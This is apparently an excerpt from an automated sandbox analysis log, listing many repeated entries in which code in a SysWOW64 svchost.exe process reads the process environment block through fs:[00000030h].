Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E47A0 mov eax, dword ptr fs:[00000030h]	1_2_031E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313C7C0 mov eax, dword ptr fs:[00000030h]	1_2_0313C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B07C3 mov eax, dword ptr fs:[00000030h]	1_2_031B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031347FB mov eax, dword ptr fs:[00000030h]	1_2_031347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031347FB mov eax, dword ptr fs:[00000030h]	1_2_031347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]	1_2_031527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]	1_2_031527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]	1_2_031527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BE7E1 mov eax, dword ptr fs:[00000030h]	1_2_031BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172619 mov eax, dword ptr fs:[00000030h]	1_2_03172619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE609 mov eax, dword ptr fs:[00000030h]	1_2_031AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]	1_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]	1_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]	1_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]	1_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]	1_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]	1_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]	1_2_0314260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E627 mov eax, dword ptr fs:[00000030h]	1_2_0314E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03166620 mov eax, dword ptr fs:[00000030h]	1_2_03166620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03168620 mov eax, dword ptr fs:[00000030h]	1_2_03168620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313262C mov eax, dword ptr fs:[00000030h]	1_2_0313262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314C640 mov eax, dword ptr fs:[00000030h]	1_2_0314C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03162674 mov eax, dword ptr fs:[00000030h]	1_2_03162674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F866E mov eax, dword ptr fs:[00000030h]	1_2_031F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F866E mov eax, dword ptr fs:[00000030h]	1_2_031F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A660 mov eax, dword ptr fs:[00000030h]	1_2_0316A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A660 mov eax, dword ptr fs:[00000030h]	1_2_0316A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03134690 mov eax, dword ptr fs:[00000030h]	1_2_03134690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03134690 mov eax, dword ptr fs:[00000030h]	1_2_03134690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031666B0 mov eax, dword ptr fs:[00000030h]	1_2_031666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316C6A6 mov eax, dword ptr fs:[00000030h]	1_2_0316C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_0316A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A6C7 mov eax, dword ptr fs:[00000030h]	1_2_0316A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_031AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_031AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_031AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_031AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B06F1 mov eax, dword ptr fs:[00000030h]	1_2_031B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B06F1 mov eax, dword ptr fs:[00000030h]	1_2_031B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C6500 mov eax, dword ptr fs:[00000030h]	1_2_031C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]	1_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]	1_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]	1_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]	1_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]	1_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]	1_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]	1_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]	1_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]	1_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]	1_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]	1_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]	1_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]	1_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]	1_2_0315E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]	1_2_0315E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]	1_2_0315E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]	1_2_0315E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]	1_2_0315E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138550 mov eax, dword ptr fs:[00000030h]	1_2_03138550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138550 mov eax, dword ptr fs:[00000030h]	1_2_03138550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316656A mov eax, dword ptr fs:[00000030h]	1_2_0316656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316656A mov eax, dword ptr fs:[00000030h]	1_2_0316656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316656A mov eax, dword ptr fs:[00000030h]	1_2_0316656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E59C mov eax, dword ptr fs:[00000030h]	1_2_0316E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03132582 mov eax, dword ptr fs:[00000030h]	1_2_03132582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03132582 mov ecx, dword ptr fs:[00000030h]	1_2_03132582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03164588 mov eax, dword ptr fs:[00000030h]	1_2_03164588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031545B1 mov eax, dword ptr fs:[00000030h]	1_2_031545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031545B1 mov eax, dword ptr fs:[00000030h]	1_2_031545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B05A7 mov eax, dword ptr fs:[00000030h]	1_2_031B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B05A7 mov eax, dword ptr fs:[00000030h]	1_2_031B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B05A7 mov eax, dword ptr fs:[00000030h]	1_2_031B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031365D0 mov eax, dword ptr fs:[00000030h]	1_2_031365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0316A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0316A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E5CF mov eax, dword ptr fs:[00000030h]	1_2_0316E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E5CF mov eax, dword ptr fs:[00000030h]	1_2_0316E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031325E0 mov eax, dword ptr fs:[00000030h]	1_2_031325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316C5ED mov eax, dword ptr fs:[00000030h]	1_2_0316C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316C5ED mov eax, dword ptr fs:[00000030h]	1_2_0316C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03168402 mov eax, dword ptr fs:[00000030h]	1_2_03168402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03168402 mov eax, dword ptr fs:[00000030h]	1_2_03168402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03168402 mov eax, dword ptr fs:[00000030h]	1_2_03168402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A430 mov eax, dword ptr fs:[00000030h]	1_2_0316A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312E420 mov eax, dword ptr fs:[00000030h]	1_2_0312E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312E420 mov eax, dword ptr fs:[00000030h]	1_2_0312E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312E420 mov eax, dword ptr fs:[00000030h]	1_2_0312E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312C427 mov eax, dword ptr fs:[00000030h]	1_2_0312C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]	1_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]	1_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]	1_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]	1_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]	1_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]	1_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]	1_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EA456 mov eax, dword ptr fs:[00000030h]	1_2_031EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312645D mov eax, dword ptr fs:[00000030h]	1_2_0312645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315245A mov eax, dword ptr fs:[00000030h]	1_2_0315245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315A470 mov eax, dword ptr fs:[00000030h]	1_2_0315A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315A470 mov eax, dword ptr fs:[00000030h]	1_2_0315A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315A470 mov eax, dword ptr fs:[00000030h]	1_2_0315A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BC460 mov ecx, dword ptr fs:[00000030h]	1_2_031BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EA49A mov eax, dword ptr fs:[00000030h]	1_2_031EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031644B0 mov ecx, dword ptr fs:[00000030h]	1_2_031644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BA4B0 mov eax, dword ptr fs:[00000030h]	1_2_031BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031364AB mov eax, dword ptr fs:[00000030h]	1_2_031364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031304E5 mov ecx, dword ptr fs:[00000030h]	1_2_031304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204B00 mov eax, dword ptr fs:[00000030h]	1_2_03204B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315EB20 mov eax, dword ptr fs:[00000030h]	1_2_0315EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315EB20 mov eax, dword ptr fs:[00000030h]	1_2_0315EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F8B28 mov eax, dword ptr fs:[00000030h]	1_2_031F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F8B28 mov eax, dword ptr fs:[00000030h]	1_2_031F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03128B50 mov eax, dword ptr fs:[00000030h]	1_2_03128B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DEB50 mov eax, dword ptr fs:[00000030h]	1_2_031DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E4B4B mov eax, dword ptr fs:[00000030h]	1_2_031E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E4B4B mov eax, dword ptr fs:[00000030h]	1_2_031E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C6B40 mov eax, dword ptr fs:[00000030h]	1_2_031C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C6B40 mov eax, dword ptr fs:[00000030h]	1_2_031C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FAB40 mov eax, dword ptr fs:[00000030h]	1_2_031FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D8B42 mov eax, dword ptr fs:[00000030h]	1_2_031D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312CB7E mov eax, dword ptr fs:[00000030h]	1_2_0312CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]	1_2_03202B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]	1_2_03202B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]	1_2_03202B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]	1_2_03202B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140BBE mov eax, dword ptr fs:[00000030h]	1_2_03140BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140BBE mov eax, dword ptr fs:[00000030h]	1_2_03140BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_031E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_031E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DEBD0 mov eax, dword ptr fs:[00000030h]	1_2_031DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03150BCB mov eax, dword ptr fs:[00000030h]	1_2_03150BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03150BCB mov eax, dword ptr fs:[00000030h]	1_2_03150BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03150BCB mov eax, dword ptr fs:[00000030h]	1_2_03150BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130BCD mov eax, dword ptr fs:[00000030h]	1_2_03130BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130BCD mov eax, dword ptr fs:[00000030h]	1_2_03130BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130BCD mov eax, dword ptr fs:[00000030h]	1_2_03130BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138BF0 mov eax, dword ptr fs:[00000030h]	1_2_03138BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138BF0 mov eax, dword ptr fs:[00000030h]	1_2_03138BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138BF0 mov eax, dword ptr fs:[00000030h]	1_2_03138BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315EBFC mov eax, dword ptr fs:[00000030h]	1_2_0315EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BCBF0 mov eax, dword ptr fs:[00000030h]	1_2_031BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BCA11 mov eax, dword ptr fs:[00000030h]	1_2_031BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03154A35 mov eax, dword ptr fs:[00000030h]	1_2_03154A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03154A35 mov eax, dword ptr fs:[00000030h]	1_2_03154A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316CA38 mov eax, dword ptr fs:[00000030h]	1_2_0316CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316CA24 mov eax, dword ptr fs:[00000030h]	1_2_0316CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315EA2E mov eax, dword ptr fs:[00000030h]	1_2_0315EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]	1_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]	1_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]	1_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]	1_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]	1_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]	1_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]	1_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140A5B mov eax, dword ptr fs:[00000030h]	1_2_03140A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140A5B mov eax, dword ptr fs:[00000030h]	1_2_03140A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031ACA72 mov eax, dword ptr fs:[00000030h]	1_2_031ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031ACA72 mov eax, dword ptr fs:[00000030h]	1_2_031ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316CA6F mov eax, dword ptr fs:[00000030h]	1_2_0316CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316CA6F mov eax, dword ptr fs:[00000030h]	1_2_0316CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316CA6F mov eax, dword ptr fs:[00000030h]	1_2_0316CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DEA60 mov eax, dword ptr fs:[00000030h]	1_2_031DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03168A90 mov edx, dword ptr fs:[00000030h]	1_2_03168A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204A80 mov eax, dword ptr fs:[00000030h]	1_2_03204A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138AA0 mov eax, dword ptr fs:[00000030h]	1_2_03138AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138AA0 mov eax, dword ptr fs:[00000030h]	1_2_03138AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03186AA4 mov eax, dword ptr fs:[00000030h]	1_2_03186AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130AD0 mov eax, dword ptr fs:[00000030h]	1_2_03130AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03164AD0 mov eax, dword ptr fs:[00000030h]	1_2_03164AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03164AD0 mov eax, dword ptr fs:[00000030h]	1_2_03164AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03186ACC mov eax, dword ptr fs:[00000030h]	1_2_03186ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03186ACC mov eax, dword ptr fs:[00000030h]	1_2_03186ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03186ACC mov eax, dword ptr fs:[00000030h]	1_2_03186ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316AAEE mov eax, dword ptr fs:[00000030h]	1_2_0316AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316AAEE mov eax, dword ptr fs:[00000030h]	1_2_0316AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BC912 mov eax, dword ptr fs:[00000030h]	1_2_031BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03128918 mov eax, dword ptr fs:[00000030h]	1_2_03128918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03128918 mov eax, dword ptr fs:[00000030h]	1_2_03128918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE908 mov eax, dword ptr fs:[00000030h]	1_2_031AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE908 mov eax, dword ptr fs:[00000030h]	1_2_031AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B892A mov eax, dword ptr fs:[00000030h]	1_2_031B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C892B mov eax, dword ptr fs:[00000030h]	1_2_031C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B0946 mov eax, dword ptr fs:[00000030h]	1_2_031B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204940 mov eax, dword ptr fs:[00000030h]	1_2_03204940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D4978 mov eax, dword ptr fs:[00000030h]	1_2_031D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D4978 mov eax, dword ptr fs:[00000030h]	1_2_031D4978
